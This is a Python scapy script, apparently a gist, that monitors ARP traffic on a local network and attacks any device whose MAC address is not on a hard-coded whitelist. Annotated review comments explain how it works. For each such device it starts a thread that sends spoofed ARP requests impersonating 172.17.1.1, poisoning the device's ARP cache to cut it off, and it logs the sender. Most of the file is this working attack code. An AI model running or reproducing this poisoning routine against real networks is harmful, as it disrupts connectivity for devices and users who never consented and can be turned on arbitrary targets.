Last active
February 19, 2021 16:44
Sniff for unauthorized clients and attack them with ARP poisoning.
#! /usr/bin/env python | |
from scapy.all import * | |
from scapy.layers.l2 import ARP, Ether | |
import time | |
import threading | |
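# Notification coalescing window (seconds): the callback reports a sender
# again only after it has been silent for longer than this.
notic_inter = 600
# Attack duration (seconds): a poisoning thread stops once its target has not
# been seen for this long; the callback also uses it as the minimum silence
# before a new thread is started for the same MAC.
attack_reset = 30
# MAC address -> time.time() of the most recent ARP packet seen from it.
# Written by the sniff callback and read by the poisoning threads.
watchlist = {}
# MAC whitelist: senders listed here are ignored by the monitor.
# NOTE(review): the MAC is read from the ARP payload, which the sender fills
# in itself, so this list identifies devices but does not authenticate them.
# Membership is an exact string match, so entries must use the same
# lower-case, colon-separated form as the values compared against it.
whitelist = {
    '84:5d:d7:ff:ff:ff',
    'ac:bc:32:ff:ff:ff',
    'a6:8e:80:ff:ff:ff',
    '18:f6:43:ff:ff:ff',
    '8e:09:d6:ff:ff:ff',
    '0a:42:ef:ff:ff:ff',
}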
# Attack function. ref: https://scapy.readthedocs.io/en/latest/usage.html?highlight=arp#arp-cache-poisoning
def arp_cache_poisoning(clientMAC, clientIP):
    """Send spoofed ARP requests to one client while it is still being seen.

    Each frame is addressed to ``clientMAC`` and carries an ARP who-has for
    ``clientIP`` whose sender IP is the hard-coded 172.17.1.1 (presumably the
    gateway of the author's network; confirm before reuse). No sender MAC is
    set here, so scapy fills in its default.

    The loop ends once ``watchlist[clientMAC]`` is at least ``attack_reset``
    seconds old, i.e. the device has been gone for a while.

    NOTE(review): ``watchlist.get(clientMAC)`` returns None for an unknown
    MAC and the subtraction would then raise TypeError; in this file the
    sniff callback stores the timestamp before it starts the thread.
    NOTE(review): on the wire this rebinds the claimed IP to a different MAC
    in the receiver's ARP cache, which is the change that switch-side ARP
    inspection and ARP-watch style monitors report.
    """
    while True:
        seconds_since_seen = time.time() - watchlist.get(clientMAC)
        if seconds_since_seen >= attack_reset:
            # The device has been silent for a full attack period: stop.
            break
        spoofed_request = Ether(dst=clientMAC) / ARP(
            op="who-has", psrc='172.17.1.1', pdst=clientIP
        )
        # inter is scapy's inter-packet delay in seconds; verbose=0 keeps
        # scapy from printing per-packet output.
        sendp(spoofed_request, inter=1, verbose=0)
# Callback passed to sniff().
def arp_monitor_callback(pkt):
    """Track non-whitelisted ARP senders, start poisoning, and report them.

    For an ARP request or reply (op 1 or 2) whose sender MAC is not in
    ``whitelist``, the sender's last-seen time in ``watchlist`` is refreshed.
    If the sender had been silent for more than ``attack_reset`` seconds, a
    new ``arp_cache_poisoning`` thread is started for it. If it had been
    silent for more than ``notic_inter`` seconds, a "HH:MM:SS mac ip" line is
    returned; otherwise the function returns None.

    NOTE(review): the nesting below is reconstructed from a listing that had
    lost its indentation; confirm it against the original file.
    NOTE(review): the sender MAC and IP come from the ARP payload, which the
    sender controls. Every previously unseen MAC adds a ``watchlist`` entry
    and a thread with no upper bound, and ``watchlist`` is shared with those
    threads without a lock; a cap or rate limit would bound both.
    """
    if ARP not in pkt:
        return None
    arp_layer = pkt[ARP]
    # Only who-has (1) and is-at (2) from senders outside the whitelist.
    if arp_layer.op not in (1, 2) or arp_layer.hwsrc in whitelist:
        return None

    now = time.time()
    sender_mac = arp_layer.hwsrc
    previously_seen = watchlist.get(sender_mac, 0)
    watchlist[sender_mac] = now
    silent_for = now - previously_seen

    # Less than one attack period since the sender was last seen means an
    # earlier thread may still be running, so no new one is started.
    if silent_for > attack_reset:
        worker = threading.Thread(
            target=arp_cache_poisoning,
            name=f'attack_{sender_mac}',
            args=(sender_mac, arp_layer.psrc),
        )
        worker.start()

    # Notify only once within ten minutes.
    if silent_for > notic_inter:
        local_t = time.localtime(time.time())
        return pkt.sprintf(f"{local_t.tm_hour:02}:{local_t.tm_min:02}:{local_t.tm_sec:02} %ARP.hwsrc% %ARP.psrc%")
    return None
# Startup banner, printed once before capture begins.
print("LINK START...")
# ref: https://scapy.readthedocs.io/en/latest/usage.html#simplistic-arp-monitor
# Capture ARP traffic only (capture filter "arp") and hand each packet to the
# callback; store=0 keeps scapy from accumulating the captured packets.
# This call runs at import time and blocks, as there is no __main__ guard.
sniff(
    filter="arp",
    prn=arp_monitor_callback,
    store=0,
)